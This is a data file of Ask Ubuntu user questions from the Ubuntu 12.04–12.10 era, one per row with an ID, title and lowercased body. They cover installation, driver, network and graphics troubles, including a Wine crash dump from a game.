271933	can not get my internet to connect	i own an hp probook 4520s laptop which is dual-booted with windows 8 pro and ubuntu 12.04 lts . i use a wired pppoe internet connection , which works fine in windows . but for the last few days i ca n't use it in ubuntu . when i start the connection from terminal it does n't show any errors , but i ca n't load any webpages in firefox . using the 'plog ' command , i get the following messages at the end : remote message : login incorrect pap authentication failed connection terminated my ethernet connection works fine in both windows and ubuntu . can anyone please help me figure out what the problem is ?
271935	how to compile php in after installing php , apache and mysql severs ?	i have installed all the necessary servers to work with php in ubuntu.. but i do n't know how to compile php in linux . my hostname is `` blackparrot '' my user name is `` red '' pls tell or show me a way to compile php here
271938	boot does n't display windows xp and ubuntu to select the os	i recently installed ubuntu 12.10 as dual boot to my windows xp . there was a booting problem : ntldr is missing . i resolved by adding two system files by copying two files by using windows xp bootable cd . now , i am not able to get select os screen as before . directly windows xp is being started . so , i re-installed ubuntu but still can not get the os selection menu . how can i resolve this problem ?
271941	how can i control an ubuntu computer from another ubuntu computer through the internet ?	i 'd like to know how to control another ubuntu os from my personal computer with ubuntu , like remote access through the internet . there is any native software to perform this task ? or a built-in software in ubuntu ? if it 's more than one , could you please list it ? thanks .
271944	move entire installation to blank partition	i have ubuntu 12.10 installed on a second hard drive ( sdb ) . i had a windows ntfs partition before that for storage but have subsequently purchased an external hard drive and transferred those files to it . i then deleted the ntfs partition leaving blank space before ubuntu . question - is there a fast way to move 12.10 over without hosing my system ? i really would prefer not to use gparted as it is painfully slow . i want to do this so when 13.04 comes out , i can install it next to 12.10 . i have never tried this so if you could be specific as possible with any advice . thanks everyone . by the way , i did see this post : how can i extend partition into free space that is not directly before or after the partition ?
271947	switching wireless card from monitor to normal mode cause system crash	i have a dell inspiron laptop , with wireless card broadcom corporation device [ 14e4:4365 ] and i have installed wireless driver : broadcom sta/wl for it . now in order to run airodump i have to put my card in monitoring mode and somewhere i found it can be done by changing /proc/brcm_monitor0 flag . so i to turn on monitor mode i do write on terminal echo 1 | tee /proc/brcm_monitor0 which allow me to start airodump on prism0 interface thus created , although it is not listed in airmon list but anyhow it captures the iv 's . so all looks great except on that when i switch back to normal mode by first stopping airmon-ng on the interface which works successfully and then echo 0 | tee /proc/brcm_monitor0 , it crashes my machine with some dump screen and a stack trace . then i need to forcefully shut it down using the power button . i am trying to search it on internet but have n't found sth useful so far . please help . thanks
271954	phone not getting detected in ddms in ubuntu 12.04 - 32bit	i am using ubuntu 12.04 32 bit . i have a micromax ninja a87 android phone running gb 2.3.5 . my problem is the phone does not get detected . when i try on a windows 7 pc , it does get detected . here are all the steps i followed but still no lucks . $ lsusb output : bus 002 device 006 : id 1c9e:9e08 omega technology i created a file called 51-android.rules with this content : subsystem== '' usb '' , attr { idvendor } == '' 1c9e '' , mode= '' 0666 '' , group= '' plugdev '' subsystem== '' usb '' , attr { idvendor } == '' 0bb4 '' , mode= '' 0666 '' , group= '' plugdev '' alternatively i tried this external link also . done chmod a+r on 51-android.rules . restarted udev , also restarted my pc . done kill-server & start-server . but still when i do adb devices it does n't detect my phone . here are some more info : usb debugging is enabled in phone . whenever i connect my phone to pc , it shows a popup in pc : usbmodem mass storage has been connected
271957	moving kubuntu from hdd to ssd	i bought a new ssd to install it in my htpc . before , i had an hdd with kubuntu . i would need to copy the files from the / partition from hdd to ssd . to do this , i booted from the kubuntu livecd , mounted both disks and copied all the files over : sudo cp -ax /media/hd /media/ssd following this answer : how to move ubuntu to an ssd , iâ´m stuck with this step : then you just need to edit the /etc/fstab on the ssd to point to the new fs uuid ( you can look it up with blkid ) . i donâ´t know how to do it because if i try to edit the /etc/fstab on the ssd , it gives me an error telling me that there is no such a file or directory . i try this approach : sudo nano /media/ssd/etc/fstab because i mounted the ssd on /media/ssd in order to copy the / partition .
271965	can you use a ubuntu 12.10 desktop install disk like an o.e.m . disk ?	i recently installed a brand new hard drive and i was wondering if i need to have windows installed before ubuntu or if it will install straight on for a clean install ? my main problem is no install disk for windows ... or one that would work .
271966	installing ubuntu i get : please use a kernel appropriate for your cpu	i 've downloaded ubuntu 12.10 and 9.04 - desktop , respectively and burned a them on separate dvd and cd . but when i run setup.exe or booting from drive e : i get a welcome display , choose language , then install ubuntu but got this error message : this kernel requires an x86-64 cpu , but only detected an i686 cpu . unable to boot - please use a kernel appropriate for your cpu . how should i go about installing ubuntu bypassing all this ?
271968	changing file names in a directory	can i change the name of all the files in a directory automatically ? for example , i want to remove all the spaces in some tex files . i do n't want to spend days going file by file and editing the name .
271971	accessing files on ubuntu installed on usb drive from other computers	let 's say i have ubuntu installed ( not as a live drive , acctually installed ) on a usb flash drive , can ( and if so , how ) i access the files saved in the home directory from another computer , ( with any os ) when i plug in the usb drive ?
271976	how to resolve `` low graphics mode '' during the installation of ubuntu ?	please be patient , i am new to the linux world . i am running win xp on an old desktop pc . i want to install ubuntu over or beside windows . the mobo is matsonic ms9388e . the onboard graphics adapter is described as : '' embedded 3d ultra agp vga '' the pc has only 512mb memory installed . i downloaded ubuntu desktop 12.04 and burnt a cd . i booted from the cd . it went straight into linux boot type output on the screen - all looking 'normal ' . after a long time ( 5/10 minutes ) i got the dreaded 'low graphics mode ' message . clicking ok got me the 'what would you like to do ' menu . i tried the various options but can get nowhere . i am concluding that the ubuntu cd can not support my onboard graphics . would this be a good assumption ? but what to do about it ? i see lots of 'sudo ' talk in other posts - but i do n't speak sudo : ( i 've looked at this question - but it only covers `` low graphics mode '' after installation - my problem occurs during the installation . how to fix `` the system is running in low-graphics mode '' error ?
271979	wubi ubuntu install - first screen after reboot is shockingly bad	i was finished the ubuntu install with wubi , and i rebooted my computer to be greeted with some dos-looking thing and it said some things i do n't remember and then `` shadow passwords enabled '' and it spammed me with weird looking `` p '' 's . what the hell happened ? nevermind , same thing here : problem with wubi installation
271984	what do these lines in the ufw logfile mean ?	these lines are repeated several times , first one at the time when remote ssh connection with the machine is lost ( mac address is the address of eth used for internet connection ) mar 24 21:20:32 ubuntu kernel : [ 565820.188684 ] [ ufw block ] in=eth1 out= mac=54 : e6 : fc:81 : b4 : ce : f8 : d1:11:7f:7b : de:08:00 src=77.234.44.52 dst=192.168.1.3 len=202 tos=0x00 prec=0x80 ttl=47 id=58666 df proto=tcp spt=80 dpt=1158 window=1 res=0x00 ack psh urgp=0 mar 24 21:20:41 ubuntu kernel : [ 565829.310850 ] [ ufw block ] in=eth1 out= mac=01:00:5e:00:00:01 : f8 : d1:11:7f:7b : de:08:00 src=192.168.1.1dst=224.0.0.1 len=32 tos=0x00 prec=0xc0 ttl=1 id=0 df proto=2 ssh is allowed for all internal network 192.168.1.0/24 and for ip address from work . writing this question and just lost again the connectivity with machine . any ideas ? nothing is changed to lead for this behaviour , just started a week ago ...
271993	battery life on zenbook ux51 ubuntu 12.10	my battery life is 2h30m in my ubuntu 12.10 but in windows i had 7h00 i installed jupiter , nothing changed . what can i do ?
271995	unable to save settings & graphics problems	i have made the transition from windows to ubuntu . however , i 've encountered the following problems : ubuntu does n't seem to save my settings , for instance , when i change the place where my downloads should be saved in deluge the location gets reset to defualt on reboot . i have big problems with my graphics card ( nvidia gtx 560 ti ) , when i do n't install the nvidia-current drivers , there are graphic errors : but , if i install nvidia-current drivers , then my machine just boots up without any icons or the side-bar also the resolution is set to 800x600 and i ca n't change it ( to fix it i have to boot up in fail-safe mode and remove the drivers via the terminal ) . i have tried to format several times , without success .
271996	why is n't ubuntu checking the correct directory in the $ path variable ?	i 'm trying to run a program redis-cli $ ls -lh /usr/local/bin/ | grep redis -rwxr-xr-x 1 root root 4.2m mar 24 19:49 redis-cli -rwxr-xr-x 1 root root 5.6m mar 24 19:49 redis-server $ echo $ path /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games if the program redis-cli exists in the directory /usr/local/bin and that directory is in my path variable , why do i get the following error ? $ redis-cli -bash : /usr/bin/redis-cli : no such file or directory edit $ /usr/local/bin/redis-cli redis 127.0.0.1:6379 > $ redis-cli -bash : /usr/bin/redis-cli : no such file or directory $ file /usr/local/bin/redis-cli /usr/local/bin/redis-cli : elf 64-bit lsb executable , x86-64 , version 1 ( sysv ) , dynamically linked ( uses shared libs ) , for gnu/linux 2.6.24 , buildid [ sha1 ] =0x3715af7983c534d902d8dc627f9b0f1b4c8b8e80 , not stripped
272004	install alongside will break my computer ? what option should i use ?	i need to install ubuntu 12.04 as dual boot from a livecd , on a pc with windows xp sp3 32 bit already installed . i understand that during the install , i 'll be asked to choose from : 1 ) install ubuntu alongside xp ... -or- 3 ) something else.. not being very technical , i 'd prefer to choose the easy , option 1 . but several web articles i read , suggest not doing that , ( they do n't give any reasons . ) , and instead choosing option 3 , which seems to involve a lot of delicate , manual repartitioning . this last manual option seems to be waaay above my tech knowledge and confidence . i 'd rather do option 1 . my question : are there any risks or caveats that something might go wrong if i choose option 1 , install ubuntu alongside xp ? i 'm not very technical , so simple english is appreciated ... : - )
272005	samsung n150 wifi problem	i have samsung n150 with ubuntu 12.04 installed on it . i ca n't connect to internet through wifi . it just keeps asking me for password . how can i fix it ?
272010	extremely slow and/or unreliable wifi on a 2009 macbook pro with bcm4322	after installing ubuntu 12.10 on my late-2009 macbook pro ( 7,1 ) , i was experiencing very slow wifi speeds , sometimes dropping below 1 kb/s and never reaching much higher than 45 kb/s . i tried installing wicd and apt-get purge'ing network-manager , and my connection was actually fine for a little bit , until wicd started slowing down , too , and eventually stopped working altogether , so now i have no access to the internet on my macbook other than ethernet . i apt-get install 'd linux-headers-generic , and then apt-get install 'd bcmwl-kernel-source , and , when i tried to `` sudo modprobe wl '' , i was shown the error : '' fatal : error inserting wl ( /lib/modules/3.5.0-22-generic/updates/dkms/wl.ko ) : invalid argument '' what am i doing wrong here ? should i install a different driver ? the results of `` lspci -nn | grep 0280 '' are as follows : 02:00.0 network controller [ 0280 ] : broadcom corporation bcm4322 802.11/a/b/g/n wireless lan controller [ 14e4:432b ] ( rev 01 )
272011	ubuntu install problems ( runs prompt then crash )	i was able to successfully boot ubuntu from the usb/dvd . however , when i want to install ubuntu the install prompt shows , i then select my region/user/keyboard/hard drive to install . then while i wait for it to finish installing the prompt crashes and boots me back to the desktop . what am i doing wrong ?
272017	brightness problem ubuntu 12.04	i 've installed ubuntu 12.04 on my asus eee netbook . it has a cedar trail processor . it has a brightness problem . i ca n't change the brightness . it is always dimmed . how can i solve this problem ?
272018	how to install ubuntu alongside windows 7 ?	i want to install ubuntu alongside windows . so i downloaded the .iso file , made a bootable usb drive and started the installation . but when i have to choose how i want to install it , it shows : install ubuntu inside windows 7 replace windows 7 with ubuntu and something else and when i choose to install it inside windows and click the button continue , my pc just restarts and opens windows . so what am i doing wrong ?
272026	setting up vim with latex suite	i am trying to setup vim with latex suite . i have installed vim from the terminal prompt sudo apt-get install vim but sudo apt-get install latex-suite or latexsuite does n't do anything . what do i do to install the latex-suite ? after that , what else needs to be done to get vim going with the suite ? i have seen the vim website but the instructions were n't helpful to me since i am new to linux .
272027	how can i run ubuntu alongside windows 8 if my comouter have a bootlocker ?	my computer has a bootlocker i have tried to bypass it but if i did , windows would n't boot anymore . advices ?
272031	ecryptfs - about 200 passwords to parse through	i know all but two characters of my password . i know , i 'm an idiot for not writing down my pass immediately after my main board went south on me , but that 's water under the bridge . anyway , i figure there are about 200 possible passwords that i need to enter , the real password being the need in the 200 password hay stack . entering passwords one at a time is incredibly tedious ( but an excellent safety feature because ti is so tedious ! ) . every time a new password is entered , the software has to spend 30-45 seconds searching for the encrypted drive before allowing me to enter the next password . is there any way to automate this process ? can i copy ten passwords , comma separated , and have it check all ten passwords ? is there a way to put the possible passwords in a file and then have the software check the passwords in the file ? if nothing else , is there a way to enter passwords without having to scan the hd for the encrypted drive and burning almost a minute between password entries ? also , pasting a password into the password entry box work or do i manually have to enter it ?
272032	configuring wacom tablet on ubuntu 12.10 by installing missing dependencies	i 've been reading a book on gimp . the book recommended that i visit the linuxwacom project for the drivers of a wacom tablet i own . after extracting the tarball , i have to configure and make install . but this part is where ./configure got interesting . configure : error : package requirements ( xorg-server > = 1.7.0 xproto xext kbproto inputproto randrproto ) were not met : no package 'xorg-server ' found no package 'xproto ' found no package 'xext ' found no package 'kbproto ' found no package 'inputproto ' found no package 'randrproto ' found consider adjusting the pkg_config_path environment variable if you installed software in a non-standard prefix . alternatively , you may set the environment variables xorg_cflags and xorg_libs to avoid the need to call pkg-config . see the pkg-config man page for more details . john @ kotux : ~/xf86-input-wacom-0.20.0 $ not to mention my laptop on 12.10 has xorg version 1.13.0 . not right . i thought it was as simple as installing the missing dependencies via apt-get , but they did n't work . john @ kotux : ~/xf86-input-wacom-0.20.0 $ sudo apt-get install xorg-server xproto xext kbproto inputproto randrproto reading package lists ... done building dependency tree reading state information ... done e : unable to locate package xorg-server e : unable to locate package xproto e : unable to locate package xext e : unable to locate package kbproto e : unable to locate package inputproto e : unable to locate package randrproto how can i install these missing packages ? i wish the process does not require much manual installation .
272038	low latency in puredata ( pd ) with jack in ubuntu studio 12.04	iâ´m having trouble to make puredata ( pd ) to work at low latency in ubuntu studio 12.04 . i get pd and jack to work together with my audio interface ( alesis io4 ) but only at a frames/period of 1024 , which means a latency of 45.2 ms. as soon as i try to lower the frames/period to lower the latency , i get an audio i/o error from pd . i tried to mess around with the oder parameters , but the only one who appears to affect pd ( and the latency ) is the frames/period . i also tried to use the configuration explained here : https : //help.ubuntu.com/community/howtojackconfiguration , but it doesnâ´t work either . i really need to get the lowest latency possible , because i work with live instruments and proccesing . any thoughts ?
272043	why ca n't i reduce the screen luminosity on toshiba l775 ?	i 've installed ubuntu on my toshiba satellite l775 but the biggest problem is that i ca n't reduce the screen luminosity , it 's too too bright and i almost ca n't use it at night .
272049	how to download ubuntu one onto ipad ?	how can i download ubuntu one onto my apple ipad so i can sync with my other devices ?
272051	cifs filesystem not found on mount	i 'm trying to mount a windows 7 in 12.10 , but it does n't seem to have cifs working . i 've installed smbfs , winbind , and cifs-utils . if i run : sudo mount -t cifs //servername/sharename /mnt/point i get this : mount error : cifs filesystem not supported by the system mount error ( 19 ) : no such device refer to the mount.cifs ( 8 ) manual page ( e.g . man mount.cifs ) i tried doing a modprobe cifs and it does n't seem to find cifs : fatal : module cifs not found . i did a uname -r to get on kernel version , which is 3.4.0 and if i search for the cifs modules there seems to only be ones for 3.2.0 . has anyone else run into this ?
272058	where are the unity desktop wallpapers located ?	yes , before i ask this question i searched for a solution here and could not find a real answer . thank you . please see the picture below :
272059	how to downgrade raring ringtail back to ubuntu 12.04 ?	i 've just updated my ubuntu 12.04 up to raring ringtail daily build , and now i wan na get back my precise . i found out that i ca n't use ati legacy drivers because of version of kernel and x-server version . if there is any way to install this driver with raring , please post me . if there is any way to downgrade kernel , lol , let me know . i just wan na play team fortress 2 on my pc with integrated video card , without using noisy hd6850 . integrated one is radeon hd4250 . thanks .
272060	ubuntu 12.10 network settings ui grayed out	i am running a pretty much stock install of 12.10 . all the ui for network settings is grayed out , like if i right click from the top right bar icon or go to system settings - > network - > options ( all the options are grayed out ) . the connections are marked as 'available to all users ' so i 'm guessing that permissions are needed to alter the settings . that 's nice , but how do i access the ui with those permissions ? ? i would be fine with launching the settings menu via sudo but do n't know the command . sudo lspci -nn output : 00:00.0 host bridge [ 0600 ] : advanced micro devices [ amd ] rs880 host bridge [ 1022:9601 ] 00:01.0 pci bridge [ 0604 ] : advanced micro devices [ amd ] rs780/rs880 pci to pci bridge ( int gfx ) [ 1022:9602 ] 00:0a.0 pci bridge [ 0604 ] : advanced micro devices [ amd ] rs780/rs880 pci to pci bridge ( pcie port 5 ) [ 1022:9609 ] 00:11.0 sata controller [ 0106 ] : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 sata controller [ ide mode ] [ 1002:4390 ] 00:12.0 usb controller [ 0c03 ] : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 usb ohci0 controller [ 1002:4397 ] 00:12.1 usb controller [ 0c03 ] : advanced micro devices [ amd ] nee ati sb7x0 usb ohci1 controller [ 1002:4398 ] 00:12.2 usb controller [ 0c03 ] : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 usb ehci controller [ 1002:4396 ] 00:13.0 usb controller [ 0c03 ] : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 usb ohci0 controller [ 1002:4397 ] 00:13.1 usb controller [ 0c03 ] : advanced micro devices [ amd ] nee ati sb7x0 usb ohci1 controller [ 1002:4398 ] 00:13.2 usb controller [ 0c03 ] : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 usb ehci controller [ 1002:4396 ] 00:14.0 smbus [ 0c05 ] : advanced micro devices [ amd ] nee ati sbx00 smbus controller [ 1002:4385 ] ( rev 3c ) 00:14.1 ide interface [ 0101 ] : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 ide controller [ 1002:439c ] 00:14.2 audio device [ 0403 ] : advanced micro devices [ amd ] nee ati sbx00 azalia ( intel hda ) [ 1002:4383 ] 00:14.3 isa bridge [ 0601 ] : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 lpc host controller [ 1002:439d ] 00:14.4 pci bridge [ 0604 ] : advanced micro devices [ amd ] nee ati sbx00 pci to pci bridge [ 1002:4384 ] 00:14.5 usb controller [ 0c03 ] : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 usb ohci2 controller [ 1002:4399 ] 00:18.0 host bridge [ 0600 ] : advanced micro devices [ amd ] family 10h processor hypertransport configuration [ 1022:1200 ] 00:18.1 host bridge [ 0600 ] : advanced micro devices [ amd ] family 10h processor address map [ 1022:1201 ] 00:18.2 host bridge [ 0600 ] : advanced micro devices [ amd ] family 10h processor dram controller [ 1022:1202 ] 00:18.3 host bridge [ 0600 ] : advanced micro devices [ amd ] family 10h processor miscellaneous control [ 1022:1203 ] 00:18.4 host bridge [ 0600 ] : advanced micro devices [ amd ] family 10h processor link control [ 1022:1204 ] 01:05.0 vga compatible controller [ 0300 ] : advanced micro devices [ amd ] nee ati rs880 [ radeon hd 4200 ] [ 1002:9710 ] 01:05.1 audio device [ 0403 ] : advanced micro devices [ amd ] nee ati rs880 hdmi audio [ radeon hd 4200 series ] [ 1002:970f ] 02:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller [ 10ec:8168 ] ( rev 02 ) 03:0e.0 firewire ( ieee 1394 ) [ 0c00 ] : texas instruments tsb43ab23 ieee-1394a-2000 controller ( phy/link ) [ 104c:8024 ]
272065	will ubuntu get better at supporting notebooks with switchable graphics ?	i own a dell vostro 3560 with a amd radeon 7670m . with my limited knowledge , i could n't manage to get ubuntu running on it ( i asked for help here back then ) . reluctantly , i made the switch to windows . that was in january 2013 . i am curious if i can expect future versions of ubuntu to work better on it ?
272066	where can i find pencil tool in open office drawing ?	in table menu in ms word , we have the option to draw a table by using pencil tool and erase the line of the table by using eraser . how can we do the same in open office drawing ?
272068	problem with log in	i can not log in to my ubuntu 12.4 , not even as a guest . every time i try it push me back to log in screen . and it says something like `` suitable mode for kernel not found '' i just instal ubuntu few weeks ago and was so happy with it until now . can someone please help me . i solve the problem ! ! ! ! i log in to bash , ( ctrl+alt+f1 ) sudo apt-get update sudo apt-get install -- reinstall ubuntu-desktop and it worked for me ; )
272075	lamp charm in a lxc container configuration query	tired of rebuilding and configuring lamp . i have been following the get started guide on juju.ubuntu.com . and have managed to expose phpyadmin and lamp following victor palau 's tutorial . however on my brand new dell xps- so no previous lamp installation - therefore , i have no var/www folder and none was created . as specified by victor : '' it also allows you to specify a bazaar branch . it will clone the branch into the webserver and copy the contents to /var/www . '' i think it maybe because i ran juju deploy lamp instead of as specified `` clone the lamp branch to a folder of your choice . i have it under â~/mycharm/precise/lampâ . '' can some please clear up why this may have happened and how i should proceed , if indeed , i do need to clone the lamp branch ? desperate to test php on this set up ... thanks
272077	port 3306 appears to be closed on my ubuntu server	i have two vps servers , and both have mysql installed , one for testing and one for development . one of my servers wo n't let me connect from outside . with the user ; 'mytestuser ' @ ' % ' according to an open port finder , port 3306 for the offending server appears to be closed . i have c++ and java programs of my own listening on arbitrary ports without any issues . why is this happening and how can i fix it ? ubuntu installed is ubuntu 11.10 ( gnu/linux 2.6.32-042stab072.10 x86_64 ) results of netstat -tuple on each server offending server tcp 0 0 localhost.lo : submission * : * listen root 39967664 - working server tcp 0 0 * : mysql * : * listen mysql 1847519288 -
272078	is it possible to convert a 32-bit ubuntu installation to 64-bit ?	as in title , is it possible to convert a 32 bit ubuntu installation to 64 bit to read additional memory after performing a memory upgrade ?
272079	amd radeon gpu only uses 384mb vram instead of +2gb dedicated video-memory	for some reason a majority if not all games are limited to only 384mbs of video memory ( vram ) instead of it 's full 2048mb dedicated memory . i read somewhere that disabling `` sych with vblank '' in the opengl menu would resolve this , but it did not . now what could be the cause of this ? take note that all 3d-applications tested have been run with wine 1.5.26 , playonlinux 4.0.14 with amd catalyst 13.1 , 13.2 and 13.3-beta3 will crash at random stating that there 's not enough video memory or that an applications error has accord , which make my first impression of ubuntu extremely unproductive , limited and most important unplayable . unhandled exception : page fault on write access to 0x00000000 in 32-bit code ( 0x018aeb5c ) . register dump : cs:0023 ss:002b ds:002b es:002b fs:0063 gs:006b eip:018aeb5c esp:0033f0f8 ebp:00000000 eflags:00010202 ( r- -- i - - - ) eax:00007fff ebx:00000000 ecx:0000001c edx:063f3d36 esi:2eb88004 edi:00000001 stack dump : 0x0033f0f8 : 0033f4d4 0072e3f0 0033f304 31a70348 0x0033f108 : 02ff0010 c38bf9ec 42934a0d 063f3d36 0x0033f118 : 063f3d36 ff3f3d36 ff3f3d36 43dfdec1 0x0033f128 : 2eb88054 c38c3821 43dedec1 428f68be 0x0033f138 : 063f3d36 000000a8 ff3f3d36 063f3d36 0x0033f148 : 000000a8 41f00000 bf7e55f9 bdce5ea0 000c : sel=0067 base=00000000 limit=00000000 16-bit rw- backtrace : = > 0 0x018aeb5c in gameclient ( +0x14eb5c ) ( 0x00000000 ) 0x018aeb5c : fsts 0xffffffe4 ( % ecx ) modules : module address debug info name ( 144 modules ) pe 340000- 355000 deferred gamedatabase pe 360000- 368000 deferred ltmemory pe 370000- 377000 deferred x3daudio1_5 pe 3a0000- 3a7000 deferred stringeditruntime pe 400000- 7c6000 deferred fear2 pe 7d0000- c1a000 deferred d3dx9_40 pe fe0000- 1028000 deferred steamclient pe 1140000- 118b000 deferred steam pe 1760000- 1992000 export gameclient pe 1aa0000- 1ae3000 deferred clientfx.fxd pe 1ed0000- 1f5b000 deferred xaudio2_3 pe 10000000-10015000 deferred steam_api pe 18000000-18033000 deferred binkw32 elf 7939e000-79400000 deferred libatiadlxx.so elf 7943f000-7b800000 deferred fglrx_dri.so elf 7b800000-7ba45000 deferred kernel32 < elf > \-pe 7b810000-7ba45000 \ kernel32 elf 7bc00000-7bcd9000 deferred ntdll < elf > \-pe 7bc10000-7bcd9000 \ ntdll elf 7bf00000-7bf04000 deferred < wine-loader > elf 7c4bf000-7c522000 deferred libmpg123.so.0 elf 7c522000-7c53a000 deferred libresolv.so.2 elf 7c53a000-7c542000 deferred libogg.so.0 elf 7c542000-7c56d000 deferred libvorbis.so.0 elf 7c56d000-7c6e5000 deferred libvorbisenc.so.2 elf 7cd4a000-7cd92000 deferred dsound < elf > \-pe 7cd50000-7cd92000 \ dsound elf 7cd92000-7cde0000 deferred libflac.so.8 elf 7cde0000-7ce52000 deferred libsndfile.so.1 elf 7ce52000-7ce9b000 deferred libdbus-1.so.3 elf 7ce9b000-7cf00000 deferred libpulsecommon-1.1.so elf 7d013000-7d029000 deferred winemp3 < elf > \-pe 7d020000-7d029000 \ winemp3 elf 7d029000-7d040000 deferred imaadp32 < elf > \-pe 7d030000-7d040000 \ imaadp32 elf 7d040000-7d08e000 deferred libpulse.so.0 elf 7d08e000-7d095000 deferred libnss_dns.so.2 elf 7d095000-7d0aa000 deferred avrt < elf > \-pe 7d0a0000-7d0aa000 \ avrt elf 7d0aa000-7d0d2000 deferred winepulse < elf > \-pe 7d0b0000-7d0d2000 \ winepulse elf 7d0d2000-7d0f4000 deferred mmdevapi < elf > \-pe 7d0e0000-7d0f4000 \ mmdevapi elf 7d434000-7d452000 deferred libgcc_s.so.1 elf 7d452000-7d46b000 deferred libatiuki.so.1 elf 7d46b000-7d557000 deferred libgl.so.1 elf 7d562000-7d569000 deferred libasyncns.so.0 elf 7d569000-7d573000 deferred libwrap.so.0 elf 7d573000-7d63c000 deferred crypt32 < elf > \-pe 7d580000-7d63c000 \ crypt32 elf 7d63c000-7d672000 deferred wintrust < elf > \-pe 7d640000-7d672000 \ wintrust elf 7d672000-7d686000 deferred psapi < elf > \-pe 7d680000-7d686000 \ psapi elf 7d686000-7d6ee000 deferred dbghelp < elf > \-pe 7d690000-7d6ee000 \ dbghelp elf 7d72d000-7d735000 deferred libjson.so.0 elf 7d74c000-7d782000 deferred uxtheme < elf > \-pe 7d750000-7d782000 \ uxtheme elf 7d782000-7d7a6000 deferred imm32 < elf > \-pe 7d790000-7d7a6000 \ imm32 elf 7d7a6000-7d7ac000 deferred libxfixes.so.3 elf 7d7ac000-7d7b7000 deferred libxcursor.so.1 elf 7d7b7000-7d7c7000 deferred libxi.so.6 elf 7d7c7000-7d7cb000 deferred libxcomposite.so.1 elf 7d7cb000-7d7d4000 deferred libxrandr.so.2 elf 7d7d4000-7d7de000 deferred libxrender.so.1 elf 7d7de000-7d7e4000 deferred libxxf86vm.so.1 elf 7d7e4000-7d7e8000 deferred libxinerama.so.1 elf 7d7e8000-7d7ef000 deferred libxdmcp.so.6 elf 7d7ef000-7d7f3000 deferred libxau.so.6 elf 7d7f3000-7d814000 deferred libxcb.so.1 elf 7d814000-7d81a000 deferred libuuid.so.1 elf 7d81a000-7d834000 deferred libice.so.6 elf 7d834000-7d968000 deferred libx11.so.6 elf 7d968000-7d97a000 deferred libxext.so.6 elf 7d97a000-7d983000 deferred libsm.so.6 elf 7d99f000-7da32000 deferred winex11 < elf > \-pe 7d9b0000-7da32000 \ winex11 elf 7da81000-7daab000 deferred libexpat.so.1 elf 7daab000-7dadf000 deferred libfontconfig.so.1 elf 7dadf000-7daf5000 deferred libz.so.1 elf 7daf5000-7db8f000 deferred libfreetype.so.6 elf 7dbab000-7dce5000 deferred oleaut32 < elf > \-pe 7dbc0000-7dce5000 \ oleaut32 elf 7dce5000-7dded000 deferred comctl32 < elf > \-pe 7dcf0000-7dded000 \ comctl32 elf 7dded000-7de65000 deferred shlwapi < elf > \-pe 7de00000-7de65000 \ shlwapi elf 7de65000-7e093000 deferred shell32 < elf > \-pe 7de70000-7e093000 \ shell32 elf 7e093000-7e1a1000 deferred opengl32 < elf > \-pe 7e0b0000-7e1a1000 \ opengl32 elf 7e1a1000-7e2da000 deferred wined3d < elf > \-pe 7e1b0000-7e2da000 \ wined3d elf 7e2da000-7e317000 deferred d3d9 < elf > \-pe 7e2e0000-7e317000 \ d3d9 elf 7e317000-7e33d000 deferred iphlpapi < elf > \-pe 7e320000-7e33d000 \ iphlpapi elf 7e33d000-7e373000 deferred ws2_32 < elf > \-pe 7e340000-7e373000 \ ws2_32 elf 7e373000-7e38f000 deferred wsock32 < elf > \-pe 7e380000-7e38f000 \ wsock32 elf 7e38f000-7e3ba000 deferred msacm32 < elf > \-pe 7e390000-7e3ba000 \ msacm32 elf 7e3ba000-7e470000 deferred winmm < elf > \-pe 7e3c0000-7e470000 \ winmm elf 7e470000-7e5ae000 deferred msvcp90 < elf > \-pe 7e4b0000-7e5ae000 \ msvcp90 elf 7e5ae000-7e650000 deferred msvcp80 < elf > \-pe 7e5c0000-7e650000 \ msvcp80 elf 7e650000-7e689000 deferred msvcr100 < elf > \-pe 7e660000-7e689000 \ msvcr100 elf 7e689000-7e72f000 deferred msvcrt < elf > \-pe 7e6a0000-7e72f000 \ msvcrt elf 7e72f000-7e75d000 deferred msvcr80 < elf > \-pe 7e740000-7e75d000 \ msvcr80 elf 7e75d000-7e7de000 deferred rpcrt4 < elf > \-pe 7e770000-7e7de000 \ rpcrt4 elf 7e7de000-7e919000 deferred ole32 < elf > \-pe 7e7f0000-7e919000 \ ole32 elf 7e942000-7e95a000 deferred wtsapi32 < elf > \-pe 7e950000-7e95a000 \ wtsapi32 elf 7e95a000-7e9c9000 deferred advapi32 < elf > \-pe 7e970000-7e9c9000 \ advapi32 elf 7e9c9000-7eae4000 deferred gdi32 < elf > \-pe 7e9e0000-7eae4000 \ gdi32 elf 7eae4000-7ec3e000 deferred user32 < elf > \-pe 7eb00000-7ec3e000 \ user32 elf 7ec3e000-7ec58000 deferred libnsl.so.1 elf 7ec58000-7ec61000 deferred libnss_compat.so.2 elf 7ec63000-7ec7d000 deferred version < elf > \-pe 7ec70000-7ec7d000 \ version elf 7efaf000-7efdb000 deferred libm.so.6 elf 7efdb000-7efe4000 deferred librt.so.1 elf 7efe7000-7eff4000 deferred libnss_files.so.2 elf 7eff4000-7f000000 deferred libnss_nis.so.2 pe 7f4a0000-7f81e000 deferred gameserver elf f7473000-f7478000 deferred libdl.so.2 elf f7478000-f7622000 deferred libc.so.6 elf f7623000-f763e000 deferred libpthread.so.0 elf f765a000-f779e000 dwarf libwine.so.1 elf f77a0000-f77c2000 deferred ld-linux.so.2 elf f77c2000-f77c3000 deferred [ vdso ] .so threads : process tid prio ( all id : s are in hex ) 0000000e services.exe 0000001f 0 0000001e 0 00000015 0 00000010 0 0000000f 0 00000012 winedevice.exe 0000001c 0 00000019 0 00000014 0 00000013 0 0000001a plugplay.exe 00000020 0 0000001d 0 0000001b 0 00000021 explorer.exe 00000022 0 00000025 ( d ) c : \program files ( x86 ) \fear2\fear2.exe 00000046 0 0000003f 0 0000003e 0 00000032 0 00000031 15 